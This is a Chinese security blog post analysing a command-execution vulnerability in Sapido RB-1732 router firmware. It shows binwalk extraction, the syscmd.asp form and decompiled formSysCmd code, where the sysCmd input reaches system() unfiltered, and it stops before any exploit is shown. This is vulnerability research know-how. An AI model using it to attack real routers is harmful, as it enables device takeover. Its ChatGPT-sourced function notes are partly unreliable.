<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"guoxb.top","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":true},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":false,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="Sapido RB-1732路由器命令执行漏洞0x01 漏洞介绍Sapido 是 SAPIDO 公司开发的一款家用路由器，其 RB-1732 系列 v2.0.43 之前的固件版本存在一处命令执行漏洞。所谓命令执行漏洞，是指服务器没有对执行的命令进行过滤，导致用户可以执行任意的系统命令。命令执行漏洞属于高危的漏洞。该漏洞产生的原因是，服务器的 syscmd.asp 页面没有对传递过来的参数进行过滤，">
<meta property="og:type" content="article">
<meta property="og:title" content="Sapido RB-1732路由器命令执行漏洞">
<meta property="og:url" content="http://guoxb.top/2023/03/30/IoT/IoT%20%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Sapido%20RB-1732%E8%B7%AF%E7%94%B1%E5%99%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="GuoXB&#39;s Blog">
<meta property="og:description" content="Sapido RB-1732路由器命令执行漏洞0x01 漏洞介绍Sapido 是 SAPIDO 公司开发的一款家用路由器，其 RB-1732 系列 v2.0.43 之前的固件版本存在一处命令执行漏洞。所谓命令执行漏洞，是指服务器没有对执行的命令进行过滤，导致用户可以执行任意的系统命令。命令执行漏洞属于高危的漏洞。该漏洞产生的原因是，服务器的 syscmd.asp 页面没有对传递过来的参数进行过滤，">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330201508532.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330205111944.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330205328217.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330211345787.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212103976.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212544971.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212701368.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212825200.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330212934163.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330213129801.png">
<meta property="og:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330215625346.png">
<meta property="article:published_time" content="2023-03-30T15:13:14.000Z">
<meta property="article:modified_time" content="2024-02-14T06:22:44.856Z">
<meta property="article:author" content="郭小白QAQ">
<meta property="article:tag" content="漏洞分析or复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330201508532.png">

<link rel="canonical" href="http://guoxb.top/2023/03/30/IoT/IoT%20%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Sapido%20RB-1732%E8%B7%AF%E7%94%B1%E5%99%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<link rel="stylesheet" type="text/css" href="/css/injector/main.css" /><link rel="preload" as="style" href="/css/injector/light.css" /><link rel="preload" as="style" href="/css/injector/dark.css" />
  <title>Sapido RB-1732路由器命令执行漏洞 | GuoXB's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<style>.darkmode--activated{--body-bg-color:#282828;--content-bg-color:#333;--card-bg-color:#555;--text-color:#ccc;--blockquote-color:#bbb;--link-color:#ccc;--link-hover-color:#eee;--brand-color:#ddd;--brand-hover-color:#ddd;--table-row-odd-bg-color:#282828;--table-row-hover-bg-color:#363636;--menu-item-bg-color:#555;--btn-default-bg:#222;--btn-default-color:#ccc;--btn-default-border-color:#555;--btn-default-hover-bg:#666;--btn-default-hover-color:#ccc;--btn-default-hover-border-color:#666;--highlight-background:#282b2e;--highlight-foreground:#a9b7c6;--highlight-gutter-background:#34393d;--highlight-gutter-foreground:#9ca9b6}.darkmode--activated img{opacity:.75}.darkmode--activated img:hover{opacity:.9}.darkmode--activated code{color:#69dbdc;background:0 0}button.darkmode-toggle{z-index:9999}.darkmode-ignore,img{display:flex!important}.beian img{display:inline-block!important}</style></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">GuoXB's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="reading-progress-bar"></div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://guoxb.top/2023/03/30/IoT/IoT%20%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Sapido%20RB-1732%E8%B7%AF%E7%94%B1%E5%99%A8%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/202303122318253.jpg">
      <meta itemprop="name" content="郭小白QAQ">
      <meta itemprop="description" content="精彩不亮丽，起落是无常">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="GuoXB's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Sapido RB-1732路由器命令执行漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-03-30 23:13:14" itemprop="dateCreated datePublished" datetime="2023-03-30T23:13:14+08:00">2023-03-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-02-14 14:22:44" itemprop="dateModified" datetime="2024-02-14T14:22:44+08:00">2024-02-14</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/IoT/" itemprop="url" rel="index"><span itemprop="name">IoT</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/IoT/IoT%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" itemprop="url" rel="index"><span itemprop="name">IoT设备漏洞复现</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>2.8k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>10 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Sapido-RB-1732路由器命令执行漏洞"><a href="#Sapido-RB-1732路由器命令执行漏洞" class="headerlink" title="Sapido RB-1732路由器命令执行漏洞"></a>Sapido RB-1732路由器命令执行漏洞</h1><h2 id="0x01-漏洞介绍"><a href="#0x01-漏洞介绍" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h2><p>Sapido 是 SAPIDO 公司开发的一款家用路由器，其 RB-1732 系列 v2.0.43 之前的固件版本存在一处命令执行漏洞。所谓命令执行漏洞，是指服务器没有对执行的命令进行过滤，导致用户可以执行任意的系统命令。命令执行漏洞属于高危的漏洞。该漏洞产生的原因是，服务器的 syscmd.asp 页面没有对传递过来的参数进行过滤，这使得用户以参数的形式将系统命令发送给服务器，并在服务器上执行。</p>
<span id="more"></span>

<h2 id="0x02-漏洞分析"><a href="#0x02-漏洞分析" class="headerlink" title="0x02 漏洞分析"></a>0x02 漏洞分析</h2><h3 id="固件获取"><a href="#固件获取" class="headerlink" title="固件获取"></a>固件获取</h3><p>本次分析使用的固件版本为：RB-1732_TC_v2.0.43</p>
<p><strong>固件下载地址：</strong></p>
<p>百度云：<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1Gj9RDlAQdCDiaLdLzQ2Aag?pwd=8381">https://pan.baidu.com/s/1Gj9RDlAQdCDiaLdLzQ2Aag?pwd=8381</a> </p>
<p>微云：<a target="_blank" rel="noopener" href="https://share.weiyun.com/RjicYRKE">https://share.weiyun.com/RjicYRKE</a></p>
<h3 id="环境配置"><a href="#环境配置" class="headerlink" title="环境配置"></a>环境配置</h3><p>本次分析使用的环境是AttifyOS，一个专门用于物联网渗透测试和分析的镜像，里边预装了许多工具，省去了自己部署环境的时间和精力。可通过<a target="_blank" rel="noopener" href="https://github.com/adi0x90/attifyos">Github仓库</a>里的下载链接下载。</p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>将下载得到的固件放入虚拟机中，使用 binwalk 提取文件系统</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330201508532.png" alt="image-20230330201508532"></p>
<p>可以看到，该固件使用的是 SquashFS 文件系统，也是使用相对比较多的一种文件系统。</p>
<p>在漏洞介绍中，我们提到，这个系列的路由器漏洞存在命令执行漏洞，原因出在这个 syscmd.asp 页面上。所以，我们先用 find 命令找到 syscmd.asp 文件的位置。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">iot@attifyos ~/D/f/_/squashfs-root&gt; find ./ -name &quot;syscmd.asp&quot;</span><br><span class="line">./web/syscmd.asp</span><br></pre></td></tr></table></figure>

<p>可以发现，syscmd.asp 文件位于 web 目录下，我们进入该目录，打开 syscmd.asp 文件进行分析。查看该文件的源码如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;! Copyright (c) Realtek Semiconductor Corp., 2003. All Rights Reserved. -&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html&quot;&gt;</span><br><span class="line">&lt;title&gt;System Command&lt;/title&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">function saveClick()&#123;</span><br><span class="line">        field = document.formSysCmd.sysCmd ;</span><br><span class="line">        if(field.value.indexOf(&quot;ping&quot;)==0 &amp;&amp; field.value.indexOf(&quot;-c&quot;) &lt; 0)&#123;</span><br><span class="line">                alert(&#x27;please add &quot;-c num&quot; to ping command&#x27;);</span><br><span class="line">                return false;</span><br><span class="line">        &#125;</span><br><span class="line">        if(field.value == &quot;&quot;)&#123;</span><br><span class="line">                alert(&quot;Command can&#x27;t be empty&quot;);</span><br><span class="line">                field.value = field.defaultValue;</span><br><span class="line">                field.focus();</span><br><span class="line">                return false ;</span><br><span class="line">        &#125;</span><br><span class="line">        return true;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;blockquote&gt;</span><br><span class="line">&lt;h2&gt;&lt;font color=&quot;#0000FF&quot;&gt;System Command&lt;/font&gt;&lt;/h2&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;form action=/goform/formSysCmd method=POST name=&quot;formSysCmd&quot;&gt;</span><br><span class="line">&lt;table border=0 width=&quot;500&quot; cellspacing=0 cellpadding=0&gt;</span><br><span class="line">  &lt;tr&gt;&lt;font size=2&gt;</span><br><span class="line"> This page can be used to run target system command.</span><br><span class="line">  &lt;/tr&gt;</span><br><span class="line">  &lt;tr&gt;&lt;hr size=1 noshade align=top&gt;&lt;/tr&gt;</span><br><span class="line">  &lt;tr&gt;</span><br><span class="line">  	&lt;td&gt;System Command: &lt;/td&gt;</span><br><span class="line">	&lt;td&gt;&lt;input type=&quot;text&quot; name=&quot;sysCmd&quot; value=&quot;&quot; size=&quot;20&quot; maxlength=&quot;50&quot;&gt;&lt;/td&gt;</span><br><span class="line">	&lt;td&gt; &lt;input type=&quot;submit&quot; value=&quot;Apply&quot; name=&quot;apply&quot; onClick=&#x27;return saveClick()&#x27;&gt;&lt;/td&gt;</span><br><span class="line"></span><br><span class="line">  &lt;/tr&gt;</span><br><span class="line">&lt;/table&gt;</span><br><span class="line">  &lt;input type=&quot;hidden&quot; value=&quot;/syscmd.asp&quot; name=&quot;submit-url&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">  &lt;script language=&quot;JavaScript&quot;&gt;</span><br><span class="line">  </span><br><span class="line">  &lt;/script&gt;</span><br><span class="line"></span><br><span class="line">  &lt;textarea rows=&quot;15&quot; name=&quot;msg&quot; cols=&quot;80&quot; wrap=&quot;virtual&quot;&gt;&lt;% sysCmdLog(); %&gt;&lt;/textarea&gt;</span><br><span class="line"></span><br><span class="line">  &lt;p&gt;</span><br><span class="line">  &lt;input type=&quot;button&quot; value=&quot;Refresh&quot; name=&quot;refresh&quot; onClick=&quot;javascript: window.location.reload()&quot;&gt;</span><br><span class="line">  &lt;input type=&quot;button&quot; value=&quot;Close&quot; name=&quot;close&quot; onClick=&quot;javascript: window.close()&quot;&gt;&lt;/p&gt;</span><br><span class="line">&lt;/blockquote&gt;</span><br><span class="line">&lt;/font&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line"></span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>我们可以看到第29行处，form 表单中的 action 指向了 &#x2F;goform&#x2F;formSysCmd。第37行处的 input 框的 name 属性为 sysCmd，这个在后边我们会看到他的作用，他其实就是传递我们发送的命令的参数名字。接着我们跟进 formSysCmd 文件，看看他对我们表单提交的数据如何处理。使用 grep 命令全局搜索 formSysCmd 字符串：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">iot@attifyos ~/D/f/_/squashfs-root&gt; grep -r &quot;formSysCmd&quot;</span><br><span class="line">Binary file bin/webs matches</span><br><span class="line">web/obama.asp:        field = document.formSysCmd.sysCmd ;</span><br><span class="line">web/obama.asp:&lt;form action=/goform/formSysCmd method=POST name=&quot;formSysCmd&quot;&gt;</span><br><span class="line">web/obama.asp:  &lt;form method=&quot;post&quot; action=&quot;goform/formSysCmd&quot; enctype=&quot;multipart/form-data&quot; name=&quot;writefile&quot;&gt;</span><br><span class="line">web/obama.asp:  &lt;form action=&quot;/goform/formSysCmd&quot; method=POST name=&quot;readfile&quot;&gt;</span><br><span class="line">web/syscmd.asp:        field = document.formSysCmd.sysCmd ;</span><br><span class="line">web/syscmd.asp:&lt;form action=/goform/formSysCmd method=POST name=&quot;formSysCmd&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>可以看到，除了 syscmd.asp 和 obama.asp 这两个页面程序，只有一个结果显示是包含在二进制应用程序 bin&#x2F;webs 中，可以初步推测 webs 程序是真正的后台处理程序。 使用 file 查看下该文件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">iot@attifyos ~/D/f/_/squashfs-root&gt; file bin/webs</span><br><span class="line">bin/webs: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked, interpreter /lib/ld-, corrupted section header size</span><br></pre></td></tr></table></figure>

<p>可以看到，是 mips 架构 32 位程序。</p>
<p>我们把 webs 导入到IDA中进行静态分析，保持默认选项不动，点击 OK 。</p>
<p>在上方菜单栏，依次点击 view -&gt; open subviews -&gt; Strings 查看全部字符串，使用 ctrl+F 快捷键搜索 formSysCmd 字符串。</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330205111944.png" alt="image-20230330205111944"></p>
<p>可以看到有两个位置存在该字符串，分别位于 0x004044DB 和 0x00471A44 这两个位置，我们依次查看。首先是 0x004044DB 位置，双击进入反汇编窗口后，如下所示：</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330205328217.png" alt="image-20230330205328217"></p>
<p>再次双击红框处的 formSysCmd字符串，跳转到 formSysCmd 函数的真实位置。</p>
<p>（采用同样的方法我们查看 0x00471A44 位置处的字符串，可以看到两个地址上的内容相同。）</p>
<p>使用 F5 快捷键进行反编译查看 formSysCmd 函数的伪代码，如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">formSysCmd</span><span class="params">(<span class="type">int</span> a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> Var; <span class="comment">// $s4</span></span><br><span class="line">  _BYTE *v3; <span class="comment">// $s1</span></span><br><span class="line">  _BYTE *v4; <span class="comment">// $s5</span></span><br><span class="line">  <span class="type">int</span> v5; <span class="comment">// $s6</span></span><br><span class="line">  <span class="type">const</span> <span class="type">char</span> *v6; <span class="comment">// $s3</span></span><br><span class="line">  _BYTE *v7; <span class="comment">// $s7</span></span><br><span class="line">  <span class="type">int</span> v8; <span class="comment">// $v0</span></span><br><span class="line">  _DWORD *v9; <span class="comment">// $s0</span></span><br><span class="line">  <span class="type">int</span> v10; <span class="comment">// $a0</span></span><br><span class="line">  <span class="type">const</span> <span class="type">char</span> *v11; <span class="comment">// $a1</span></span><br><span class="line">  <span class="type">int</span> v12; <span class="comment">// $v0</span></span><br><span class="line">  <span class="type">int</span> v13; <span class="comment">// $s1</span></span><br><span class="line">  <span class="type">void</span> (__fastcall *v14)(<span class="type">int</span>, _DWORD *); <span class="comment">// $t9</span></span><br><span class="line">  _BYTE *v15; <span class="comment">// $a0</span></span><br><span class="line">  _BYTE *v16; <span class="comment">// $a3</span></span><br><span class="line">  <span class="type">int</span> v17; <span class="comment">// $a0</span></span><br><span class="line">  <span class="type">int</span> v18; <span class="comment">// $v0</span></span><br><span class="line">  <span class="type">char</span> v20[<span class="number">104</span>]; <span class="comment">// [sp+20h] [-68h] BYREF</span></span><br><span class="line"></span><br><span class="line">  Var = websGetVar(a1, <span class="string">&quot;submit-url&quot;</span>, &amp;dword_47F498);</span><br><span class="line">  v3 = (_BYTE *)websGetVar(a1, <span class="string">&quot;sysCmd&quot;</span>, &amp;dword_47F498);</span><br><span class="line">  v4 = (_BYTE *)websGetVar(a1, <span class="string">&quot;writeData&quot;</span>, &amp;dword_47F498);</span><br><span class="line">  v5 = websGetVar(a1, <span class="string">&quot;filename&quot;</span>, &amp;dword_47F498);</span><br><span class="line">  v6 = (<span class="type">const</span> <span class="type">char</span> *)websGetVar(a1, <span class="string">&quot;fpath&quot;</span>, &amp;dword_47F498);</span><br><span class="line">  v7 = (_BYTE *)websGetVar(a1, <span class="string">&quot;readfile&quot;</span>, &amp;dword_47F498);</span><br><span class="line">  <span class="keyword">if</span> ( *v3 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">snprintf</span>(v20, <span class="number">100</span>, <span class="string">&quot;%s 2&gt;&amp;1 &gt; %s&quot;</span>, v3);</span><br><span class="line">    system(v20);</span><br><span class="line">  &#125;</span><br><span class="line">······</span><br></pre></td></tr></table></figure>

<p>可以看到，在23行处，v3 变量通过 websGetVar 函数获取sysCmd传递过来的内容。还记得吗？刚才提到过 sysCmd 这个字符串，他是 input 框的 name 属性的值。然后接下来，在 if 处，使用 snprintf函数将得到的结果进行拼接并赋值给 v20 变量。紧接着就调用 system 函数执行 v20 里边的内容。注意到，这里并没有对 v20 变量的内容做任何过滤，所以就是这里导致了命令执行漏洞。</p>
<p>Ps：这里有一个奇怪的地方就是，我用IDA反编译出来的 snprintf 函数参数列表里最后只有 v3 变量，而网上的博客里反编译出来的伪代码中，在 v3 之后还有一个 “&#x2F;tmp&#x2F;syscmd.log” 字符串，比较奇怪，不过影响不是特别大。我又尝试了使用Ghidra来反编译，如下图所示，可以看到Ghidra反编译出来，snprintf 函数参数列表最后是有字符串的，还是Ghidra对MIPS架构支持的比较好啊，当然也可能是我IDA没有额外装mips插件的原因。</p>
<p><img src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/image-20230330211345787.png" alt="image-20230330211345787"></p>
<p>这里补充下几个函数的定义，通过chatGPT查到的，不得不感叹下真的好用，比搜索引擎搜索关键词然后再翻博客效率高多了。</p>
<ol>
<li><strong>websGetVar</strong></li>
</ol>
<p><code>websGetVar</code>函数是Web管理界面服务器<code>WebMux</code>提供的API函数之一，用于从请求中获取指定名称的变量值，即从HTTP请求中提取参数值。其函数原型为：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char_t</span> *<span class="title function_">websGetVar</span><span class="params">(<span class="type">webs_t</span> wp, <span class="type">char_t</span> *name, <span class="type">char_t</span> *defaultValue)</span>;</span><br></pre></td></tr></table></figure>

<p>函数参数的含义如下：</p>
<ul>
<li><code>wp</code>：指向当前HTTP请求的<code>webs_t</code>结构体指针。该结构体包含了请求相关的信息，如请求方法、URL、头部信息、请求体等等。</li>
<li><code>name</code>：需要获取的变量名称，即需要提取的参数的名称。</li>
<li><code>defaultValue</code>：当变量名称不存在时，返回的默认值。</li>
</ul>
<p>该函数的返回值为字符串类型的变量值，即参数对应的值，如果变量不存在则返回默认值。需要注意的是，返回值是指向静态内存空间的指针，不要尝试释放该指针，也不要尝试修改其指向的内容。</p>
<p>下面是一个使用<code>websGetVar</code>函数的例子：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char_t</span> *name = websGetVar(wp, <span class="string">&quot;name&quot;</span>, <span class="string">&quot;unknown&quot;</span>);</span><br><span class="line"><span class="comment">// 获取名为 &quot;name&quot; 的参数的值，如果参数不存在则返回 &quot;unknown&quot;</span></span><br></pre></td></tr></table></figure>

<p>在上面的例子中，如果HTTP请求中包含名为 “name” 的参数，则函数将返回该参数的值，否则将返回 “unknown”。</p>
<ol start="2">
<li><strong>snprintf</strong></li>
</ol>
<p><code>snprintf </code>函数是C语言标准库中的一个函数，用于将格式化的字符串输出到指定的字符数组中，并且可以限制输出字符的数量，以防止溢出。其函数原型为：</p>
